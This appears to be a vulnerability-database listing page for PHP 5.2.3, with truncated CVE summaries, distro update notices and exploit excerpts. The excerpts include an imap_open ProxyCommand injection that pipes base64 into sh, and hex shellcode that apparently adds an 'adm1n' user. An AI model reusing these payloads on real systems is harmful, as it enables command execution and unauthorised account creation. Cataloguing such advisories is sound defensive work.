EUVD-2007-4490

Malware in sbrugna...

PHP 5.2.3 imap (Debian Based) - imap_open Disable Functions Bypass

PHP 5.2.3 imap Debian Based - imapopen Disable Functions Bypass /tmp/test0001 $server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh"; imapopen''.$server.':143/imapINBOX', '', '' or die"\n\nError: ".imaplasterror;...

CVE-2007-4255

Buffer overflow in the mSQL extension in PHP 5.2.3 allows context-dependent attackers to execute arbitrary code via a long first argument to the msqlconnect function...

CVE-2007-4507

Multiple buffer overflows in the phpntuser component for PHP 5.2.3 allow context-dependent attackers to cause a denial of service or execute arbitrary code via long arguments to the 1 ntusergetuserlist, 2 ntusergetuserinfo, 3 ntusergetusergroups, or 4 ntusergetdomaincontroller functions...

CVE-2007-3790

The comprinttypeinfo function in the bz2 extension in PHP 5.2.3 allows context-dependent attackers to cause a denial of service via a long argument...

PHP <= 5.1.6 Chunk_Split() Function Integer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/24261/info PHP is prone to an integer-overflow vulnerability because it fails to ensure that integer values aren't overrun. Attackers may exploit this issue to cause a buffer overflow and to corrupt process memory...

PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit

No description provided by source. ?php //PHP = 5.2.3 snmpget object id local Buffer Overflow eip overwrite exploit //bug discovered by rgod //Original advisory: http://retrogod.altervista.org/php446snmpgetlocalbof.html //quote=rgodmore than 256 chars result in simple eip overwrite/quote //right!...

PHP <= 5.2.3 (php_win32sti) Local Buffer Overflow Exploit (2)

No description provided by source. ?php ---------------------------------------------------- --------PHP win32std Buffer Overflow Exploit-------- ---------------------------------------------------- -Tested on:-PHP 5.2.3------------------------------- ------------Windows XP SP2...

PHP <= 5.2.3 EXT/Session HTTP Response Header Injection Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/24268/info PHP is prone to an HTTP-response-header-injection vulnerability because it fails to sanitize user-supplied input. An attacker can exploit this issue to inject additional cookie attributes into session cookies...

Fedora Update for php-doctrine-Doctrine FEDORA-2011-4098

Check for the Version of php-doctrine-Doctrine OpenVAS Vulnerability Test Fedora Update for php-doctrine-Doctrine FEDORA-2011-4098 Authors: System Generated Check Copyright: Copyright c 2011 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it...

[SECURITY] Fedora 14 Update: php-doctrine-Doctrine-1.2.4-1.fc14

Doctrine is an object relational mapper ORM for PHP 5.2.3+ that sits on t op of a powerful database abstraction layer DBAL. One of its key features is the option to write database queries in a proprietary object oriented SQL diale ct called Doctrine Query Language DQL, inspired by Hibernates HQL...

[SECURITY] Fedora 15 Update: php-doctrine-Doctrine-1.2.4-1.fc15

Doctrine is an object relational mapper ORM for PHP 5.2.3+ that sits on t op of a powerful database abstraction layer DBAL. One of its key features is the option to write database queries in a proprietary object oriented SQL diale ct called Doctrine Query Language DQL, inspired by Hibernates HQL...

Multiple PHP Functions - Local Denial of Service Vulnerabilities

Exploit for multiple platform in category dos / poc ================================================================ Multiple PHP Functions - Local Denial of Service Vulnerabilities ================================================================ cominvoke // http://www.nullbyte.org.il // //...

PHP 5.2.3 Glob 函数拒绝服务漏洞

No description provided by source...

PHP 5.2.4及之前版本存在多个漏洞

PHP是一款流行的网络编程语言。 PHP存在多个安全问题，远程攻击者可以利用漏洞进行缓冲区溢出，拒绝服务，和安全绕过攻击。 -dl处理文件名存在问题，可导致跨站脚本攻击。 -dl处理MAXPATHLEN参数大小存在问题，可导致拒绝服务攻击。 -tmlentities/htmlspecialchars处理部分多字节序列存在问题。 -fnmatch, setlocale和glob函数的glibc实现存在缓冲区溢出。 Slackware Linux 10.2 Slackware Linux 10.1 Slackware Linux 12.0 Slackware Linux 11.0...

CVE-2007-4782

PHP before 5.2.3 allows context-dependent attackers to cause a denial of service application crash via 1 a long string in the pattern parameter to the glob function; or 2 a long string in the string parameter to the fnmatch function, accompanied by a pattern parameter value with undefined...

CVE-2007-4661

The chunksplit function in string.c in PHP 5.2.3 does not properly calculate the needed buffer size due to precision loss when performing integer arithmetic with floating point numbers, which has unknown attack vectors and impact, possibly resulting in a heap-based buffer overflow. NOTE: this is...

CVE-2007-4661

CVE-2007-4661 affects PHP 5.2.3: the chunk_split function miscomputes the required buffer size due to precision loss in floating point arithmetic, which can lead to a heap-based buffer overflow. The description notes this stems from an incomplete fix for CVE-2007-2872 and lists the impact as unkn...

php523winbrowse-overflow.txt

"adm1n" password="netjackal" $SC= "\xEB\x19\x5A\x31\xC0\x50\x88\x42\x52\x52\xBB\x6D\x13\x86". "\x7C\xFF\xD3\xBB\xDA\xCD\x81\x7C\x31\xC0\x50\xFF\xD3\xE8". "\xE2\xFF\xFF\xFF\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63". "\x20\x6E\x65\x74\x20\x75\x73\x65\x72\x20\x61\x64\x6D\x31"...

phpget-overflow.txt

...